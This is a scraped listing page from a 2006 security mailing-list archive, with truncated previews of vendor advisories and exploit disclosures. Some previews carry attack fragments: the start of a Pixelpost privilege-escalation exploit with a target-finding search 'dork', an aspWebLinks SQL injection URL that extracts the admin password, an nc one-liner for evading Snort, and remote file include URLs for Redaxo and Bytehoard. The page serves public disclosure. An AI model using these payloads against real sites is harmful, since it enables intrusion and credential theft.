|
|
Colapse all |
Post message
[SECURITY] [DSA 1087-1] New PostgreSQL packages fix encoding vulnerabilities 2006-06-03 joey infodrom org (Martin Schulze) Pixelpost <= 1-5rc1-2 multiple vulnerabilities 2006-06-03 rgod autistici org #!/usr/bin/php -q -d short_open_tag=on <? echo "Pixelpost <= 1-5rc1-2 privilege escalation exploit\r\n"; echo "by rgod rgod (at) autistici (dot) org [email concealed]\r\n"; echo "site: http://retrogod.altervista.org\r\n"; echo "dork: pixelpost \"RSS 2.0\" \"ATOM feed\" \"Valid xHTML / Valid CSS\"\r\n\r\n"; /* works wit [ more ] [ reply ] Re: Re: # MHG Security Team --- PHP NUKE All version Remote File Inc. 2006-06-02 Steven M. Christey (coley mitre org) >include("../../../mainfile.php"); > >include($phpbb_root_path.'common.'.$phpEx); > >... > >in mainfile.php at lines 54-56 > >... > >import_request_variables('GPC'); Oh, OK - now that makes sense. This looks like one aspect of the "globals overwrite" problem as originally documented by Stefan E [ more ] [ reply ] rPSA-2006-0091-1 firefox thunderbird 2006-06-02 Justin M. Forbes (jmforbes rpath com) rPath Security Advisory: 2006-0091-1 Published: 2006-06-02 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Local User Deterministic Vulnerability Updated Versions: firefox=/conary.rpath.com@rpl:devel//1/1.5.0.4-1-0.1 thunderbird=/conary.rpath.com@rpl:devel//1/1.5.0.4 [ more ] [ reply ] [DRUPAL-SA-2006-006] Drupal 4.6.7 / 4.7.1 fixes arbitrary file execution issue 2006-06-02 Uwe Hermann (uwe hermann-uwe de) [DRUPAL-SA-2006-008] Drupal 4.6.8 / 4.7.2 fixes XSS issue 2006-06-02 Uwe Hermann (uwe hermann-uwe de) [DRUPAL-SA-2006-007] Drupal 4.6.8 / 4.7.2 fixes arbitrary file execution issue 2006-06-02 Uwe Hermann (uwe hermann-uwe de) [DRUPAL-SA-2006-005] Drupal 4.6.7 / 4.7.1 fixes SQL injection issue 2006-06-02 Uwe Hermann (uwe hermann-uwe de) # MHG Security Team --- MyBloggie 2.1.1 version Remote File Include Vulnerabilit 2006-06-02 erne ayaz (beceriksiz1986 hotmail com) # Milli-Harekat Advisory ( www.milli-harekat.org ) # MyBloggie <= 2.1.1 version - Remote File Include Vulnerabilities # Risk : meduim # Class: Remote # Script : MyBloggie 2.1.1 version # Msn : erne [at] ernealizm.com # Credits : ERNE # Thanks : Dj_ReMix,Eskobar,Blackened,TR_IP,ßy KorsaN,OsL3 [ more ] [ reply ] new bug 2006-06-02 webmaster azhteam com ################ Azhteam Digital Security Team ################# # # ASHOPKART20 # # Find by Soltan_defacer # Greetings; s.defacer - azhteam - lvl3hr # # # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Contact: soltan_defacer (at) yahoo (dot) com [email concealed] or http://www.azhteam.com # [ more ] [ reply ] [SECURITY] [DSA 1086-1] New xmcd packages fix denial of service 2006-06-02 joey infodrom org (Martin Schulze) aspWebLinks 2.0 Remote SQL Injection / Admin Pass Change Exploit 2006-06-02 ajannhwt hotmail com <!-- # Title : aspWebLinks 2.0 Remote Admin Pass Change Exploit and links.asp SQL Injection # Author : ajann # Dork : aspWebLinks 2.0 SQL INJECTION: http://[target]/[path]/links.asp?action=reporterror&linkID=221%20union%2 0select+0,administrativepassword,0,0,0,0,0,0,0+from+config --> [ more ] [ reply ] New Snort Bypass - Patch - Bypass of Patch 2006-06-02 Sigint Consulting (info sigint-consulting com) (1 replies) There was a Snort evasion bug posted on BugTraq today http://www.securityfocus.com/archive/1/435600/30/0/threaded This attack will not show up in alert file at all perl -e 'print "GET \x90\x90\x0d http/1.0\r\n\r\n"'|nc 192.168.1.3 80 Notice the \x0d CR character (\r) above. The following will sho [ more ] [ reply ] Redaxo CMS <= 3.2 Remote File Include 2006-06-02 beford (xbefordx gmail com) Script: Redaxo CMS Vendor: http://www.redaxo.de Discovered: beford <xbefordx gmail com> Redaxo 3.2 - 3.1 - 3.0 ./redaxo/include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PAT H]=attacker Redaxo 3.0 ./redaxo3_0_demos_patched/redaxo/include/addons/image_resize/pages/index .inc.php?subpage=r [ more ] [ reply ] Re: Jiwa Financials - Reporting allows execution of arbitrary reports as SQL user with full permissions. 2006-06-02 mikes jiwa com au Secunia security advisory categorises it as "less critical" : http://secunia.com/advisories/20342/ I'm not going to argue with experts - our categorisation of the risk level stays as it is. Original report (which has been edited) claimed it was a remote exploit - this is false, and seems to [ more ] [ reply ] Bytehoard 2.1 Remote File Include 2006-06-02 beford (xbefordx gmail com) Script: Bytehoard 2.1 Epsilon/Delta www.bytehoard.org Discovered: beford <xbefordx gmail com> File: ./bytehoard/includes/webdav/server.php Vuln: Remote File Include [code] require_once $bhconfig['bhfilepath']."/includes/webdav/_parse_propfind.php"; [/code] http://url.com/bytehoard/includes/webda [ more ] [ reply ] VMSA-2006-0002 - VMware Server sensitive information lifetime issue 2006-06-02 VMware Security Team (security vmware com) Re: Re: # MHG Security Team --- PHP NUKE All version Remote File Inc. 2006-06-02 nukedx nukedx com Yeah,its so weird. vulnerable code in pagestart.php at line 68. http://victim/modules/Forums/admin/admin_styles.php?phpbb_root_path=2 Warning: main(2common.php): failed to open stream: No such file or directory in C:\Inetpub\vhosts\victim\httpdocs\modules\Forums\admin\pagestart.php on line 68 Jus [ more ] [ reply ] Re: my Web Server << v-1.0 Denial of Service Exploit 2006-06-01 Steven M. Christey (coley mitre org) str0ke asked: >Is this the same vulnerability? >http://www.securityfocus.com/bid/5954 Well, let's see. Short answer is "probably not because they don't seem to be the same product." The most recent disclosure points to "MY Web Server" at http://eitsop.s5.com/, which links to source code in a [ more ] [ reply ] |
|
Privacy Statement |
Hash: SHA1
- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1087-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze
June 3rd, 2006
[ more ] [ reply ]